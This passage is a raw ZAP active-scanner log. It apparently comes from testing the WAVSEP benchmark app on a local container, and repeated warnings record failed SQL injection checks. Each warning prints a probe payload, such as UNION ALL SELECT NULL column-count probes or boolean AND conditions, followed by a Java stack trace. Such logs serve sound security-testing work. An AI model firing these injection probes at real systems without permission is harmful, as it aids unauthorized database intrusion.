Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679590 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679592 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679593 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679593 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 6346=4303 AND (7448=7448] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 6346=4303 AND (7448=7448 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679594 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679595 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 7322=7322 AND (8186=8186] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 7322=7322 AND (8186=8186 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679596 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 6346=4303 AND (7448=7448] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 6346=4303 AND (7448=7448 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679596 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679597 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 8754=8104] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8754=8104 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679598 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679599 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 4206=4206] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4206=4206 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679599 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679600 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 8754=8104] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8754=8104 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679600 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown 